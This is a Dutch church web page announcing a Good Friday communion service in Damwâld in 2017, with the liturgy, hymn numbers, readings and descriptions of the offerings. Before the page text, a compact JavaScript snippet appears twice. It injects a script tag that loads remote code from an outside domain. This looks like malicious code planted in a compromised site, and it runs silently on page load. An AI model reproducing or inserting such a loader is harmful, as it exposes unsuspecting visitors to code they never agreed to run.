;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Viering Heilig Avondmaal Goede Vrijdag - PKN Damwâld
vrijdag 14 april 2017
09:30 uur
Viering Heilig Avondmaal

Viering Heilig Avondmaal Goede Vrijdag

Thema: “Gebroken”

Informatie

Voorganger:Ds. G. Timmer, Twijzelerheide
Organist:Ivo van Hijum
Thema:“Gebroken”
Mededeling:Viering Heilig Avondmaal
Liturgie
Lied voor de dienst ELB 395: 1, 2 en 3
Welkom en mededelingen
We zingen: ELB 209: 1, 2 en 3
Stil gebed, bemoediging en groet .
Loflied: Gezang 147: 1, 4, 5 en 6
Apostolische Geloofsbelijdenis
We zingen: Psalm 103: 1
Gebed
We lezen: Lukas 22: 14-20 en 23: 44-47
Collecte
We zingen: ELB 409: 1, 2, 3 en 4
Verkondiging : “Gebroken”
We zingen: Gezang 183: 1, 2 en 4
Afsluiting van de week van voorbereiding: 4 vragen Avondmaalsformulier
Gebed .
We zingen: Gezang 358: 1, 2 en 4
Viering van het avondmaal
Dankgebed
We zingen: Psalm 138 : 4
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: De Ikker Hearewei 1, Damwâld
Collecte informatie
Eerste collecte: Siriz

Siriz is de specialist bij onbedoelde zwangerschap. Zij bieden preventie, ondersteuning en zorg. Door middel van voorlichting onder jongeren willen zij het aantal onbedoelde zwangerschappen in Nederland terugdringen. Daarnaast verlenen zij kortdurende en langdurende psychosociale hulp aan vrouwen en mannen die te maken krijgen met een onbedoelde zwangerschap. Tevens bieden zij opvang aan zwangere vrouwen zonder woonplek die intensieve begeleiding nodig hebben als voorbereiding op het moederschap op jonge leeftijd. Zij werken in heel Nederland met 45 beroepskrachten en 120 opgeleide vrijwilligers. Siriz is opgericht in september 2010 en komt voort uit de VBOK.

Tweede collecte: Kerk
Uitganscollecte: Avondmaalscollecte noodhulp Oost Afrika

De komende 6 maanden dreigt er hongersnood voor meer dan 20 miljoen mensen in Afrika. Deze mensen lijden aan voedselgebrek en ondervoeding. Alleen al in Zuid-Soedan hebben 100.000 mensen direct hongersnood en lopen 5,5 miljoen mensen risico daarop. Bovendien wordt daar tot juli geen regen verwacht. De situatie is dus nijpend. De landen die het ernstigst getroffen worden zijn: Zuid-Soedan, Nigeria, Somalië en Jemen. Hier speelt zich de ergste honger af met meer dan 20 miljoen mensen in nood. Een hongersnood komt maar zelden voor - de laatste keer was in 2011 in Somalië, waarbij destijds het schrikbarende aantal van meer dan 250.000 doden vielen. Voor delen van Zuid-Soedan is nu al officieel een hongersnood afgekondigd, die momenteel 100.000 mensen treft. Ook in verschillende buurlanden dreigt eenzelfde situatie te ontstaan. Ingrijpen is hard nodig om verdere hongersnood te voorkomen!